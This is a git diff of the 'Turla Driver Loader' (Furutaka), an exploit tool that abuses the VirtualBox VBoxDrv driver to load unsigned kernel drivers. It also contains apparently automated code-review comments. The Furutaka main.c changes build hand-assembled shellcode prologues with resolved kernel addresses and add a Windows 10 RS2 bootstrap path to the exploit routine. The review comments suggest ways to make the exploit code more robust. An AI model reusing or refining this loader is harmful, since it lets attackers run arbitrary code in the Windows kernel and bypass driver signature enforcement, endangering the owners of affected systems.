diff --git a/Compiled/Furutaka.exe b/Compiled/Furutaka.exe index 348832e..0e7377b 100644 Binary files a/Compiled/Furutaka.exe and b/Compiled/Furutaka.exe differ diff --git a/Compiled/dummy.sys b/Compiled/dummy.sys index 8a043a6..a280227 100644 Binary files a/Compiled/dummy.sys and b/Compiled/dummy.sys differ diff --git a/Compiled/dummy2.sys b/Compiled/dummy2.sys index 959260a..0b1cc6d 100644 Binary files a/Compiled/dummy2.sys and b/Compiled/dummy2.sys differ diff --git a/Source/DummyDrv/dummy.sln b/Source/DummyDrv/dummy.sln index 28627ee..6c35f1c 100644 --- a/Source/DummyDrv/dummy.sln +++ b/Source/DummyDrv/dummy.sln @@ -1,7 +1,7 @@  Microsoft Visual Studio Solution File, Format Version 12.00 # Visual Studio 14 -VisualStudioVersion = 14.0.24720.0 +VisualStudioVersion = 14.0.25420.1 MinimumVisualStudioVersion = 10.0.40219.1 Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "dummy", "dummy\dummy.vcxproj", "{3D8146DE-8064-46C0-9E70-CEEC357B2290}" EndProject diff --git a/Source/DummyDrv/dummy/dummy.vcxproj b/Source/DummyDrv/dummy/dummy.vcxproj index da49f9f..a4e87e1 100644 --- a/Source/DummyDrv/dummy/dummy.vcxproj +++ b/Source/DummyDrv/dummy/dummy.vcxproj @@ -1,14 +1,6 @@  - - Debug - Win32 - - - Release - Win32 - Debug x64 @@ -17,22 +9,6 @@ Release x64 - - Debug - ARM - - - Release - ARM - - - Debug - ARM64 - - - Release - ARM64 - {3D8146DE-8064-46C0-9E70-CEEC357B2290} @@ -45,22 +21,6 @@ 8.1 - - Windowsv6.3 - true - WindowsKernelModeDriver10.0 - Driver - KMDF - Universal - - - Windowsv6.3 - false - WindowsKernelModeDriver10.0 - Driver - KMDF - Universal - Windowsv6.3 true @@ -78,38 +38,6 @@ Universal true - - Windowsv6.3 - true - WindowsKernelModeDriver10.0 - Driver - KMDF - Universal - - - Windowsv6.3 - false - WindowsKernelModeDriver10.0 - Driver - KMDF - Universal - - - Windowsv6.3 - true - WindowsKernelModeDriver10.0 - Driver - KMDF - Universal - - - Windowsv6.3 - false - WindowsKernelModeDriver10.0 - Driver - KMDF - Universal - 
@@ -118,18 +46,6 @@ - - DbgengKernelDebugger - AllRules.ruleset - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - - - DbgengKernelDebugger - AllRules.ruleset - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - DbgengKernelDebugger AllRules.ruleset @@ -143,30 +59,6 @@ .\output\$(Platform)\$(Configuration)\ .\output\$(Platform)\$(Configuration)\ - - DbgengKernelDebugger - AllRules.ruleset - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - - - DbgengKernelDebugger - AllRules.ruleset - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - - - DbgengKernelDebugger - AllRules.ruleset - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - - - DbgengKernelDebugger - AllRules.ruleset - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - false @@ -192,36 +84,6 @@ false - - - false - - - - - false - - - - - false - - - - - false - - - - - false - - - - - false - - false diff --git a/Source/DummyDrv/dummy/main.c b/Source/DummyDrv/dummy/main.c index dade601..c3cd920 100644 --- a/Source/DummyDrv/dummy/main.c +++ b/Source/DummyDrv/dummy/main.c @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2016 +* (C) COPYRIGHT AUTHORS, 2016 - 2017 * * TITLE: MAIN.C * -* VERSION: 1.00 +* VERSION: 1.01 * -* DATE: 29 Jan 2016 +* DATE: 20 Apr 2017 * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED 
@@ -29,35 +29,57 @@ DRIVER_INITIALIZE DriverEntry; * */ NTSTATUS DriverEntry( - _In_ struct _DRIVER_OBJECT *DriverObject, - _In_ PUNICODE_STRING RegistryPath - ) + _In_ struct _DRIVER_OBJECT *DriverObject, + _In_ PUNICODE_STRING RegistryPath +) { - LARGE_INTEGER tm; - PEPROCESS Process; + PEPROCESS Process; + KIRQL Irql; + PWSTR sIrql; - tm.QuadPart = -10000000; + /* This parameters are invalid due to nonstandard way of loading and should not be used. */ + UNREFERENCED_PARAMETER(DriverObject); + UNREFERENCED_PARAMETER(RegistryPath); - /* This parameters are invalid due to nonstandard way of loading and should not be used. */ - UNREFERENCED_PARAMETER(DriverObject); - UNREFERENCED_PARAMETER(RegistryPath); + DbgPrint("Hello from kernel mode, system range start is %p, code mapped at %p\n", MmSystemRangeStart, DriverEntry); - DbgPrint("Hello from kernel mode, system range start is %p, code mapped at %p", MmSystemRangeStart, DriverEntry); + Process = PsGetCurrentProcess(); + DbgPrint("I'm at %s, Process : %lu (%p)\n", + __FUNCTION__, + (ULONG)PsGetCurrentProcessId(), + Process); - Process = PsGetCurrentProcess(); + Irql = KeGetCurrentIrql(); - do { + switch (Irql) { - KeDelayExecutionThread(KernelMode, FALSE, &tm); - - DbgPrint("I'm at %s, Process : %lu (%p)", - __FUNCTION__, - (ULONG)PsGetCurrentProcessId(), - Process - ); + case PASSIVE_LEVEL: + sIrql = L"PASSIVE_LEVEL"; + break; + case APC_LEVEL: + sIrql = L"APC_LEVEL"; + break; + case DISPATCH_LEVEL: + sIrql = L"DISPATCH_LEVEL"; + break; + case CMCI_LEVEL: + sIrql = L"CMCI_LEVEL"; + break; + case CLOCK_LEVEL: + sIrql = L"CLOCK_LEVEL"; + break; + case IPI_LEVEL: + sIrql = L"IPI_LEVEL"; + break; + case HIGH_LEVEL: + sIrql = L"HIGH_LEVEL"; + break; + default: + sIrql = L"Unknown Value"; + break; + } + DbgPrint("KeGetCurrentIrql=%ws\n", sIrql); - } while (1); - - return STATUS_SUCCESS; + return STATUS_SUCCESS; } diff --git a/Source/DummyDrv2/dummy.sln b/Source/DummyDrv2/dummy.sln index 28627ee..6c35f1c 100644 
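Review bot: `DbgPrint("KeGetCurrentIrql=%ws\n", sIrql);` at the end of the new switch formats a wide string, and DbgPrint's `%ws`/`%wc` conversions are documented as usable only at PASSIVE_LEVEL, so on exactly the DISPATCH_LEVEL-and-above paths this code exists to report, the print itself is unsafe. Narrow literals avoid it: declare `PCSTR sIrql;`, assign `"PASSIVE_LEVEL"` and the other labels as narrow strings, and print with `DbgPrint("KeGetCurrentIrql=%s\n", sIrql);`. `PrintIrql` in the DummyDrv2 main.c hunk has the same `%ws` conversion and needs the same change. The relocated comment would read better as `/* These parameters are invalid due to the nonstandard way of loading and should not be used. */`.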
--- a/Source/DummyDrv2/dummy.sln +++ b/Source/DummyDrv2/dummy.sln @@ -1,7 +1,7 @@  Microsoft Visual Studio Solution File, Format Version 12.00 # Visual Studio 14 -VisualStudioVersion = 14.0.24720.0 +VisualStudioVersion = 14.0.25420.1 MinimumVisualStudioVersion = 10.0.40219.1 Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "dummy", "dummy\dummy.vcxproj", "{3D8146DE-8064-46C0-9E70-CEEC357B2290}" EndProject diff --git a/Source/DummyDrv2/dummy/dummy.vcxproj b/Source/DummyDrv2/dummy/dummy.vcxproj index 8fa877b..fd7810d 100644 --- a/Source/DummyDrv2/dummy/dummy.vcxproj +++ b/Source/DummyDrv2/dummy/dummy.vcxproj @@ -1,14 +1,6 @@  - - Debug - Win32 - - - Release - Win32 - Debug x64 @@ -17,22 +9,6 @@ Release x64 - - Debug - ARM - - - Release - ARM - - - Debug - ARM64 - - - Release - ARM64 - {3D8146DE-8064-46C0-9E70-CEEC357B2290} @@ -45,22 +21,6 @@ 8.1 - - Windowsv6.3 - true - WindowsKernelModeDriver10.0 - Driver - KMDF - Universal - - - Windowsv6.3 - false - WindowsKernelModeDriver10.0 - Driver - KMDF - Universal - Windowsv6.3 true @@ -78,38 +38,6 @@ Universal true - - Windowsv6.3 - true - WindowsKernelModeDriver10.0 - Driver - KMDF - Universal - - - Windowsv6.3 - false - WindowsKernelModeDriver10.0 - Driver - KMDF - Universal - - - Windowsv6.3 - true - WindowsKernelModeDriver10.0 - Driver - KMDF - Universal - - - Windowsv6.3 - false - WindowsKernelModeDriver10.0 - Driver - KMDF - Universal - @@ -118,18 +46,6 @@ - - DbgengKernelDebugger - AllRules.ruleset - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - - - DbgengKernelDebugger - AllRules.ruleset - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - DbgengKernelDebugger AllRules.ruleset 
@@ -143,30 +59,6 @@ .\output\$(Platform)\$(Configuration)\ .\output\$(Platform)\$(Configuration)\ - - DbgengKernelDebugger - AllRules.ruleset - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - - - DbgengKernelDebugger - AllRules.ruleset - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - - - DbgengKernelDebugger - AllRules.ruleset - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - - - DbgengKernelDebugger - AllRules.ruleset - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - false @@ -192,36 +84,6 @@ false - - - false - - - - - false - - - - - false - - - - - false - - - - - false - - - - - false - - false diff --git a/Source/DummyDrv2/dummy/main.c b/Source/DummyDrv2/dummy/main.c index 7b434d3..b933d1c 100644 --- a/Source/DummyDrv2/dummy/main.c +++ b/Source/DummyDrv2/dummy/main.c @@ -1,12 +1,14 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2016 +* (C) COPYRIGHT AUTHORS, 2016 - 2017 * * TITLE: MAIN.C * -* VERSION: 1.00 +* VERSION: 1.01 * -* DATE: 29 Jan 2016 +* DATE: 20 Apr 2017 +* +* "Driverless" example #2 * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED 
@@ -19,6 +21,51 @@ #define DEBUGPRINT +/* +* PrintIrql +* +* Purpose: +* +* Debug print current irql. +* +*/ +VOID PrintIrql() +{ + KIRQL Irql; + PWSTR sIrql; + + Irql = KeGetCurrentIrql(); + + switch (Irql) { + + case PASSIVE_LEVEL: + sIrql = L"PASSIVE_LEVEL"; + break; + case APC_LEVEL: + sIrql = L"APC_LEVEL"; + break; + case DISPATCH_LEVEL: + sIrql = L"DISPATCH_LEVEL"; + break; + case CMCI_LEVEL: + sIrql = L"CMCI_LEVEL"; + break; + case CLOCK_LEVEL: + sIrql = L"CLOCK_LEVEL"; + break; + case IPI_LEVEL: + sIrql = L"IPI_LEVEL"; + break; + case HIGH_LEVEL: + sIrql = L"HIGH_LEVEL"; + break; + default: + sIrql = L"Unknown Value"; + break; + } + DbgPrint("KeGetCurrentIrql=%u(%ws)\n", Irql, sIrql); +} + /* * DevioctlDispatch * @@ -168,26 +215,6 @@ NTSTATUS CloseDispatch( return Irp->IoStatus.Status; } -VOID ListModules( - _In_ struct _DRIVER_OBJECT *DriverObject - ) -{ - PLIST_ENTRY entry0, entry1; - KLDR_DATA_TABLE_ENTRY *section = (KLDR_DATA_TABLE_ENTRY*)DriverObject->DriverSection; - - if (section == NULL) - return; - - entry0 = section->InLoadOrderLinks.Flink; - entry1 = entry0; - - do { - section = (KLDR_DATA_TABLE_ENTRY*)CONTAINING_RECORD(entry1, KLDR_DATA_TABLE_ENTRY, InLoadOrderLinks); - DbgPrint("Section=%p, %wZ", section, section->BaseDllName); - entry1 = entry1->Flink; - } while (entry1 != entry0); -} - /* * DriverInitialize * 
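Review bot: `VOID PrintIrql()` declares an unprototyped function in C; an empty parameter list should be written `VOID PrintIrql(VOID)` so that a call with arguments is rejected at compile time instead of silently accepted. The purpose block says only "Debug print current irql"; adding `* Output goes to the kernel debugger via DbgPrint; intended for diagnostics only.` would make clear that the helper has no functional role, which matters because the rest of the file gates its diagnostics behind `DEBUGPRINT`.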
@@ -202,37 +229,33 @@ NTSTATUS DriverInitialize( ) { NTSTATUS status; - UNICODE_STRING SymLink, DevName/*, DrvRefName*/; + UNICODE_STRING SymLink, DevName; PDEVICE_OBJECT devobj; ULONG t; - WCHAR szDevName[] = { L'\\', L'D', L'e', L'v', L'i', L'c', L'e', L'\\', L'T', L'D', L'L', L'D', 0 }; - WCHAR szSymLink[] = { L'\\', L'D', L'o', L's', L'D', L'e', L'v', L'i', L'c', L'e', L's', L'\\', L'T', L'D', L'L', L'D', 0 }; -// WCHAR szNullDrv[] = { L'\\', L'D', L'r', L'i', L'v', L'e', L'r', L'\\', L'N', L'u', L'l', L'l', 0 }; -// PDRIVER_OBJECT driverObject; //RegistryPath is NULL - UNREFERENCED_PARAMETER(RegistryPath); + UNREFERENCED_PARAMETER(RegistryPath); #ifdef DEBUGPRINT - DbgPrint("%s", __FUNCTION__); + DbgPrint("%s\n", __FUNCTION__); #endif - RtlInitUnicodeString(&DevName, szDevName); + RtlInitUnicodeString(&DevName, L"\\Device\\TDLD"); status = IoCreateDevice(DriverObject, 0, &DevName, FILE_DEVICE_UNKNOWN, FILE_DEVICE_SECURE_OPEN, TRUE, &devobj); #ifdef DEBUGPRINT - DbgPrint("%s IoCreateDevice(%wZ) = %lx", __FUNCTION__, DevName, status); + DbgPrint("%s IoCreateDevice(%wZ) = %lx\n", __FUNCTION__, DevName, status); #endif if (!NT_SUCCESS(status)) { return status; } - RtlInitUnicodeString(&SymLink, szSymLink); + RtlInitUnicodeString(&SymLink, L"\\DosDevices\\TDLD"); status = IoCreateSymbolicLink(&SymLink, &DevName); #ifdef DEBUGPRINT - DbgPrint("%s IoCreateSymbolicLink(%wZ) = %lx", __FUNCTION__, SymLink, status); + DbgPrint("%s IoCreateSymbolicLink(%wZ) = %lx\n", __FUNCTION__, SymLink, status); #endif devobj->Flags |= DO_BUFFERED_IO; 
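Review bot: The result of `IoCreateSymbolicLink(&SymLink, &DevName)` is only printed, never tested: execution falls through to `devobj->Flags |= DO_BUFFERED_IO;` even when `status` is a failure, so the device object created just above stays registered while initialization continues on a half-set-up driver (the rest of DriverInitialize is outside this hunk, so whether the failed status is eventually returned cannot be seen here). Mirror the IoCreateDevice check immediately after the `#endif`: `if (!NT_SUCCESS(status)) { IoDeleteDevice(devobj); return status; }`.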
@@ -246,17 +269,6 @@ NTSTATUS DriverInitialize( DriverObject->DriverUnload = NULL; //nonstandard way of driver loading, no unload devobj->Flags &= ~DO_DEVICE_INITIALIZING; -/* - RtlInitUnicodeString(&DrvRefName, szNullDrv); - if (NT_SUCCESS(ObReferenceObjectByName(&DrvRefName, OBJ_CASE_INSENSITIVE, NULL, 0, - *IoDriverObjectType, KernelMode, NULL, &driverObject))) - { - DbgPrint("drvObj %p", driverObject); - ListModules(driverObject); - ObDereferenceObject(driverObject); - } - */ - return status; } @@ -274,22 +286,23 @@ NTSTATUS DriverEntry( ) { NTSTATUS status; - UNICODE_STRING drvName; - WCHAR szDrvName[] = { L'\\', L'D', L'r', L'i', L'v', L'e', L'r', L'\\', L'T', L'D', L'L', L'D', 0 }; - + UNICODE_STRING drvName; + /* This parameters are invalid due to nonstandard way of loading and should not be used. */ UNREFERENCED_PARAMETER(DriverObject); UNREFERENCED_PARAMETER(RegistryPath); + PrintIrql(); + #ifdef DEBUGPRINT - DbgPrint("%s", __FUNCTION__); + DbgPrint("%s\n", __FUNCTION__); #endif - RtlInitUnicodeString(&drvName, szDrvName); + RtlInitUnicodeString(&drvName, L"\\Driver\\TDLD"); status = IoCreateDriver(&drvName, &DriverInitialize); #ifdef DEBUGPRINT - DbgPrint("%s IoCreateDriver(%wZ) = %lx", __FUNCTION__, drvName, status); + DbgPrint("%s IoCreateDriver(%wZ) = %lx\n", __FUNCTION__, drvName, status); #endif return status; diff --git a/Source/DummyDrv2/dummy/main.h b/Source/DummyDrv2/dummy/main.h index e69a424..4e203fd 100644 --- a/Source/DummyDrv2/dummy/main.h +++ b/Source/DummyDrv2/dummy/main.h @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2016 +* (C) COPYRIGHT AUTHORS, 2016 - 2017 * * TITLE: MAIN.H * -* VERSION: 1.00 +* VERSION: 1.01 * -* DATE: 29 Jan 2016 +* DATE: 20 Apr 2017 * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED 
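Review bot: `PrintIrql();` is the only diagnostic in DriverEntry that is not wrapped in `#ifdef DEBUGPRINT`, so a build with DEBUGPRINT undefined still emits the IRQL line while every other DbgPrint in the function goes quiet. Wrap it the same way, `#ifdef DEBUGPRINT` / `PrintIrql();` / `#endif`, or move the call into the guarded block two lines below so the function has a single switch for debug output. The blank line that replaced the removed `szDrvName` array carries trailing whitespace (`+    ` followed by nothing), which most editors and clang-format will keep flagging.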
@@ -24,21 +24,6 @@ IoCreateDriver( IN PDRIVER_INITIALIZE InitializationFunction ); -NTKERNELAPI -NTSTATUS -ObReferenceObjectByName( - __in PUNICODE_STRING ObjectName, - __in ULONG Attributes, - __in_opt PACCESS_STATE AccessState, - __in_opt ACCESS_MASK DesiredAccess, - __in POBJECT_TYPE ObjectType, - __in KPROCESSOR_MODE AccessMode, - __inout_opt PVOID ParseContext, - __out PVOID *Object - ); - -extern POBJECT_TYPE *IoDriverObjectType; - _Dispatch_type_(IRP_MJ_DEVICE_CONTROL) DRIVER_DISPATCH DevioctlDispatch; _Dispatch_type_(IRP_MJ_CREATE) @@ -88,25 +73,3 @@ typedef struct _INOUT_PARAM { ULONG Param3; ULONG Param4; } INOUT_PARAM, *PINOUTPARAM; - -typedef struct _KLDR_DATA_TABLE_ENTRY { - LIST_ENTRY InLoadOrderLinks; - PVOID ExceptionTable; - ULONG ExceptionTableSize; - // ULONG padding on IA64 - PVOID GpValue; - PVOID NonPagedDebugInfo; - PVOID DllBase; - PVOID EntryPoint; - ULONG SizeOfImage; - UNICODE_STRING FullDllName; - UNICODE_STRING BaseDllName; - ULONG Flags; - USHORT LoadCount; - USHORT __Unused5; - PVOID SectionPointer; - ULONG CheckSum; - // ULONG padding on IA64 - PVOID LoadedImports; - PVOID PatchInformation; -} KLDR_DATA_TABLE_ENTRY, *PKLDR_DATA_TABLE_ENTRY; diff --git a/Source/Furutaka/Furutaka.vcxproj b/Source/Furutaka/Furutaka.vcxproj index ce94cc4..ddc2985 100644 --- a/Source/Furutaka/Furutaka.vcxproj +++ b/Source/Furutaka/Furutaka.vcxproj @@ -53,7 +53,7 @@ false .\output\$(Platform)\$(Configuration)\ .\output\$(Platform)\$(Configuration)\ - NativeRecommendedRules.ruleset + AllRules.ruleset false @@ -78,23 +78,23 @@ Level4 - MaxSpeed + Full true true NDEBUG;_CONSOLE;%(PreprocessorDefinitions) - true CompileAsC true true false - Guard - MultiThreaded + MultiThreadedDLL + Neither + true Console true true - true + false TDLMain true RequireAdministrator diff --git a/Source/Furutaka/global.h b/Source/Furutaka/global.h index b15eb0d..b886899 100644 --- a/Source/Furutaka/global.h +++ b/Source/Furutaka/global.h 
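Review bot: The Release configuration of Furutaka.vcxproj quietly loses settings in the second hunk: the line carrying the value `Guard` is removed, a linker value flips from `true` to `false`, and `MultiThreaded` becomes `MultiThreadedDLL`, but the element names did not survive in this rendering, so which options these are cannot be confirmed from the page. If `Guard` belongs to the `ControlFlowGuard` element, the binary no longer opts into Control Flow Guard, and the CRT change means the executable now depends on the Visual C++ redistributable DLL at run time instead of being self-contained; neither is mentioned in the version-bump header comments. A sentence in the commit message or the project notes stating why the hardening and CRT settings changed would save the next reader from reverse-engineering the intent from a property sheet diff.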
@@ -4,9 +4,9 @@ * * TITLE: GLOBAL.H * -* VERSION: 1.10 +* VERSION: 1.11 * -* DATE: 17 Apr 2017 +* DATE: 20 Apr 2017 * * Common header file for the program support routines. * diff --git a/Source/Furutaka/main.c b/Source/Furutaka/main.c index c0b7c24..c6b259e 100644 --- a/Source/Furutaka/main.c +++ b/Source/Furutaka/main.c @@ -4,9 +4,9 @@ * * TITLE: MAIN.C * -* VERSION: 1.10 +* VERSION: 1.11 * -* DATE: 17 Apr 2017 +* DATE: 20 Apr 2017 * * Furutaka entry point. * @@ -34,17 +34,18 @@ BOOL g_ConsoleOutput = FALSE; BOOL g_VBoxInstalled = FALSE; WCHAR g_BE = 0xFEFF; +ULONG g_NtBuildNumber = 0; + #define VBoxDrvSvc TEXT("VBoxDrv") #define supImageName "furutaka" #define supImageHandle 0x1a000 #define PAGE_SIZE 0x1000 -#define scDataOffset 0x214 //shellcode data offset -#define T_LOADERTITLE TEXT("Turla Driver Loader v1.1 (17/04/17)") +#define T_LOADERTITLE TEXT("Turla Driver Loader v1.1.1 (20/04/17)") #define T_LOADERUNSUP TEXT("Unsupported WinNT version\r\n") #define T_LOADERRUN TEXT("Another instance running, close it before\r\n") #define T_LOADERUSAGE TEXT("Usage: loader drivertoload\n\re.g. loader mydrv.sys\r\n") -#define T_LOADERINTRO TEXT("Turla Driver Loader v1.1.0 started\r\n(c) 2016 - 2017 TDL Project\r\nSupported x64 OS : 7 and above\r\n") +#define T_LOADERINTRO TEXT("Turla Driver Loader v1.1.1 started\r\n(c) 2016 - 2017 TDL Project\r\nSupported x64 OS : 7 and above\r\n") /* * TDLVBoxInstalled @@ -83,8 +84,8 @@ BOOL TDLVBoxInstalled( * */ void TDLRelocImage( - ULONG_PTR Image, - ULONG_PTR NewImageBase + _In_ ULONG_PTR Image, + _In_ ULONG_PTR NewImageBase ) { PIMAGE_OPTIONAL_HEADER popth; @@ -139,9 +140,9 @@ void TDLRelocImage( * */ ULONG_PTR TDLGetProcAddress( - ULONG_PTR KernelBase, - ULONG_PTR KernelImage, - LPCSTR FunctionName + _In_ ULONG_PTR KernelBase, + _In_ ULONG_PTR KernelImage, + _In_ LPCSTR FunctionName ) { ANSI_STRING cStr; 
@@ -163,9 +164,9 @@ ULONG_PTR TDLGetProcAddress( * */ void TDLResolveKernelImport( - ULONG_PTR Image, - ULONG_PTR KernelImage, - ULONG_PTR KernelBase + _In_ ULONG_PTR Image, + _In_ ULONG_PTR KernelImage, + _In_ ULONG_PTR KernelBase ) { PIMAGE_OPTIONAL_HEADER popth; @@ -211,8 +212,9 @@ void TDLResolveKernelImport( * */ void TDLExploit( - LPVOID Shellcode, - ULONG CodeSize + _In_ LPVOID Shellcode, + _In_ ULONG CodeSize, + _In_ ULONG DataOffset ) { SUPCOOKIE Cookie; @@ -307,7 +309,7 @@ void TDLExploit( ultohex(CodeSize, _strend(text)); _strcat(text, TEXT("\r\n\tDriver image mapped at 0x")); - u64tohex((ULONG_PTR)ImageBase + scDataOffset, _strend(text)); + u64tohex((ULONG_PTR)ImageBase + DataOffset, _strend(text)); cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); } @@ -376,13 +378,14 @@ void TDLExploit( * */ UINT TDLMapDriver( - LPWSTR lpDriverFullName + _In_ LPWSTR lpDriverFullName ) { UINT result = (UINT)-1; - ULONG isz; + ULONG isz, prologueSize, dataOffset; SIZE_T memIO; - ULONG_PTR KernelBase, KernelImage = 0, xExAllocatePoolWithTag = 0, xPsCreateSystemThread = 0; + ULONG_PTR KernelBase, KernelImage = 0; + ULONG_PTR xExAllocatePoolWithTag = 0, xPsCreateSystemThread = 0, xZwClose = 0; HMODULE Image = NULL; PIMAGE_NT_HEADERS FileHeader; PBYTE Buffer = NULL; 
@@ -443,16 +446,30 @@ UINT TDLMapDriver( cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); } - RtlInitString(&routineName, "PsCreateSystemThread"); - status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID)&xPsCreateSystemThread); - if ((!NT_SUCCESS(status)) || (xPsCreateSystemThread == 0)) { - cuiPrintText(g_ConOut, TEXT("Ldr: Error, PsCreateSystemThread address not found"), g_ConsoleOutput, TRUE); - break; - } - else { - _strcpy(text, TEXT("Ldr: PsCreateSystemThread 0x")); - u64tohex(KernelBase + (xPsCreateSystemThread - KernelImage), _strend(text)); - cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + if (g_NtBuildNumber < 15063) { + RtlInitString(&routineName, "PsCreateSystemThread"); + status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID)&xPsCreateSystemThread); + if ((!NT_SUCCESS(status)) || (xPsCreateSystemThread == 0)) { + cuiPrintText(g_ConOut, TEXT("Ldr: Error, PsCreateSystemThread address not found"), g_ConsoleOutput, TRUE); + break; + } + else { + _strcpy(text, TEXT("Ldr: PsCreateSystemThread 0x")); + u64tohex(KernelBase + (xPsCreateSystemThread - KernelImage), _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + } + + RtlInitString(&routineName, "ZwClose"); + status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID)&xZwClose); + if ((!NT_SUCCESS(status)) || (xZwClose == 0)) { + cuiPrintText(g_ConOut, TEXT("Ldr: Error, ZwClose address not found"), g_ConsoleOutput, TRUE); + break; + } + else { + _strcpy(text, TEXT("Ldr: ZwClose 0x")); + u64tohex(KernelBase + (xZwClose - KernelImage), _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + } } memIO = isz + PAGE_SIZE; 
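Review bot: The build-number threshold `15063` is a bare literal here and appears twice more in the following hunk of TDLMapDriver; a named constant defined next to `g_NtBuildNumber` (name of your choosing, e.g. `#define NT_BUILD_RS2 15063` as a constructed example) with a comment that it is the first Windows 10 RS2 build would keep the three tests in step. The two resolve blocks added here are copies of each other differing only in the routine name, the output pointer and the printed label, and the ExAllocatePoolWithTag block above the hunk presumably follows the same shape; a small static helper taking those three would remove the duplication. `g_NtBuildNumber` is initialised to 0, so the `< 15063` branch is taken silently if this function ever runs before TDLMain stores `osv.dwBuildNumber`; that ordering is presumably guaranteed by TDLMain, which is outside this hunk, but a comment at the declaration stating the dependency would make it explicit.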
@@ -470,25 +487,49 @@ UINT TDLMapDriver( // mov rcx, ExAllocatePoolWithTag // mov rdx, PsCreateSystemThread + // mov r8, ZwClose Buffer[0x00] = 0x48; // mov rcx, xxxxx Buffer[0x01] = 0xb9; *((PULONG_PTR)&Buffer[2]) = KernelBase + (xExAllocatePoolWithTag - KernelImage); - Buffer[0x0a] = 0x48; // mov rdx, xxxxx - Buffer[0x0b] = 0xba; - *((PULONG_PTR)&Buffer[0x0c]) = - KernelBase + (xPsCreateSystemThread - KernelImage); - RtlCopyMemory(Buffer + 0x14, - TDLBootstrapLoader_code, sizeof(TDLBootstrapLoader_code)); - RtlCopyMemory(Buffer + scDataOffset, Image, isz); + if (g_NtBuildNumber < 15063) { + Buffer[0x0a] = 0x48; // mov rdx, xxxxx + Buffer[0x0b] = 0xba; + *((PULONG_PTR)&Buffer[0x0c]) = + KernelBase + (xPsCreateSystemThread - KernelImage); + Buffer[0x14] = 0x49; //mov r8, xxxxx + Buffer[0x15] = 0xb8; + *((PULONG_PTR)&Buffer[0x16]) = + KernelBase + (xZwClose - KernelImage); + + prologueSize = 0x1e; + } + else { + prologueSize = 0x0a; + } + + dataOffset = prologueSize + MAX_SHELLCODE_LENGTH; + + if (g_NtBuildNumber < 15063) { + RtlCopyMemory(Buffer + prologueSize, + TDLBootstrapLoader_code, sizeof(TDLBootstrapLoader_code)); + cuiPrintText(g_ConOut, TEXT("Ldr: Default bootstrap shellcode selected"), g_ConsoleOutput, TRUE); + } + else { + RtlCopyMemory(Buffer + prologueSize, + TDLBootstrapLoader_code_w10rs2, sizeof(TDLBootstrapLoader_code_w10rs2)); + cuiPrintText(g_ConOut, TEXT("Ldr: Windows 10 RS2+ bootstrap shellcode selected"), g_ConsoleOutput, TRUE); + } + + RtlCopyMemory(Buffer + dataOffset, Image, isz); cuiPrintText(g_ConOut, TEXT("Ldr: Resolving kernel import"), g_ConsoleOutput, TRUE); - TDLResolveKernelImport((ULONG_PTR)Buffer + scDataOffset, KernelImage, KernelBase); + TDLResolveKernelImport((ULONG_PTR)Buffer + dataOffset, KernelImage, KernelBase); cuiPrintText(g_ConOut, TEXT("Ldr: Executing exploit"), g_ConsoleOutput, TRUE); - TDLExploit(Buffer, isz + PAGE_SIZE); + TDLExploit(Buffer, isz + PAGE_SIZE, dataOffset); result = 0; break; } 
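Review bot: `if (g_NtBuildNumber < 15063)` is evaluated twice in a row in this hunk, once to emit the prologue bytes and once to pick the bootstrap array, and the two halves are one decision; merging them into a single branch that sets the prologue, `prologueSize`, the array copy and the status line together removes the chance of the two tests drifting apart, and the literal should be a named constant rather than repeated. `dataOffset = prologueSize + MAX_SHELLCODE_LENGTH;` assumes both bootstrap arrays fit inside `MAX_SHELLCODE_LENGTH` bytes, yet nothing checks it, so `C_ASSERT(sizeof(TDLBootstrapLoader_code) <= MAX_SHELLCODE_LENGTH);` and the same for `TDLBootstrapLoader_code_w10rs2`, placed next to their definitions in shellcode.h, would turn a future overrun of the reserved area into a compile error instead of a silent memory corruption. The `//mov r8, xxxxx` comment is the only one in the prologue without a space after `//`; match the neighbouring `// mov rcx, xxxxx` style.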
